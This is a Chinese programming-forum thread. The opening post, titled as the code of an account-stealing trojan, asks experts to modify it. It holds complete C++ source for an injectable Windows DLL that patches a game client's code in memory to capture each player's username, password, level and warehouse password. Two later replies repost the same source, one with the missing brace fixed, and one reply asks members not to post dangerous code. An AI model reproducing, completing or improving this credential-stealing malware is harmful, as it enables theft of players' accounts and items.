搜索
返回列表 发新帖
查看: 1398|回复: 7
打印 上一主题 下一主题

这就是盗号木马的编程,请大神修改一下

[复制链接]
1010336773
跳转到指定楼层
楼主
发表于 2014-8-30 09:54:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
5啊哈币
/** main.cpp **/
#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
DWORD ui_cegui;
void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;
char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;
DWORD stroePath=0;
void _stdcall StroeUnhook();
void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);
return;
}
__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}
void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;
}
__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}
void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);
::MessageBox(NULL,data,"ok",0);
}
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}
void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void HookGrade()
{
DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();
return 0;
}
BOOL APIENTRY DllMain( HANDLE hModule,
       DWORD ul_reason_for_call,
       LPVOID lpReserved
       )
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
   DWORD ThreadId;
   CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
   break;
}

default:break;
}
return TRUE;



回复

举报

1234567654321
沙发
发表于 2014-8-30 14:02:58 | 只看该作者
我是大神?不敢当!你才是大神!你写的我看都看不懂!牛
回复

举报

4399APPLE
板凳
发表于 2014-8-30 14:20:01 | 只看该作者
最后少了一个大括号
回复

举报

rosynirvana
地板
发表于 2014-8-30 17:57:58 | 只看该作者
不要发危险代码上来,谢谢合作
回复

举报

4399APPLE
5#
发表于 2014-8-30 19:10:45 | 只看该作者
rosynirvana 发表于 2014-8-30 17:57
不要发危险代码上来,谢谢合作

                                      
回复

举报

葛奕成
6#
发表于 2014-9-7 11:52:18 | 只看该作者
[mw_shl_code=c,true]/** main.cpp **/
#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
DWORD ui_cegui;
void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;
char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;
DWORD stroePath=0;
void _stdcall StroeUnhook();
void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);
return;
}
__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}
void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;
}
__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}
void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);
::MessageBox(NULL,data,"ok",0);
}
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}
void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void HookGrade()
{
DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();
return 0;
}
BOOL APIENTRY DllMain( HANDLE hModule,
       DWORD ul_reason_for_call,
       LPVOID lpReserved
       )
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
   DWORD ThreadId;
   CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
   break;
}

default:break;
}
return TRUE;
}[/mw_shl_code]
回复

举报

葛奕成
7#
发表于 2014-9-7 11:52:58 | 只看该作者
[mw_shl_code=c,true]/** main.cpp **/
#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
DWORD ui_cegui;
void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;
char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;
DWORD stroePath=0;
void _stdcall StroeUnhook();
void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

   *lpRet=(void*)buff;
   return i+(DWORD)hModule;

}

}
return 0;
}
void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);
return;
}
__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}
void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;
}
__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}
void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);
::MessageBox(NULL,data,"ok",0);
}
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}
void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void HookGrade()
{
DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();
return 0;
}
BOOL APIENTRY DllMain( HANDLE hModule,
       DWORD ul_reason_for_call,
       LPVOID lpReserved
       )
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
   DWORD ThreadId;
   CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
   break;
}

default:break;
}
return TRUE;
}。[/mw_shl_code]
回复

举报

李布铎
8#
发表于 2014-9-20 16:20:59 | 只看该作者
/tiao
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

广播台
特别关注
阿哈王国(武汉)教育科技有限公司©2018      鄂ICP备17029633号-1
AhaKingdom (Wuhan) Education & Technology Co., Ltd.
快速回复 返回顶部 返回列表